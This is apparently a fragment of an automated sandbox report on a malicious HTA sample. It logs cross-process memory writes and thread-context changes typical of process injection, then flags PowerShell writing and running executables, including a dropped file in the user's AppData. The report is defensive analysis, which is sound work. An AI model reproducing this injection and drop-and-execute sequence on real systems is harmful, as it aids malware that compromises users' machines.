WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: ¨; base_address: 0x004a6000 process_identifier: 2760 process_handle: 0x00000450	1	1
WriteProcessMemory July 8, 2024, 6:25 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2760 process_handle: 0x00000450	1	1
NtSetContextThread July 8, 2024, 6:25 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4205478 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000448 process_identifier: 2760	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000448 suspend_count: 1 process_identifier: 2760	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000144 suspend_count: 1 process_identifier: 152	1	0
CreateProcessInternalW July 8, 2024, 6:25 p.m.	thread_identifier: 2268 thread_handle: 0x00000108 process_identifier: 2212 current_directory: filepath: track: 1 command_line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES13B3.tmp" "c:\Users\test22\AppData\Local\Temp\CSC13A2.tmp" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000100	1	1
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x000002b4 suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000308 suspend_count: 1 process_identifier: 2544	1	0
NtResumeThread July 8, 2024, 6:25 p.m.	thread_handle: 0x00000470 suspend_count: 1 process_identifier: 2544	1	0

The process powershell.exe wrote an executable file to disk which it then attempted to execute (23 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\notepad.exe
file	C:\Windows\SysWOW64\mshta.exe
file	C:\Users\test22\AppData\Roaming\Erlnb.exe

venture45.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All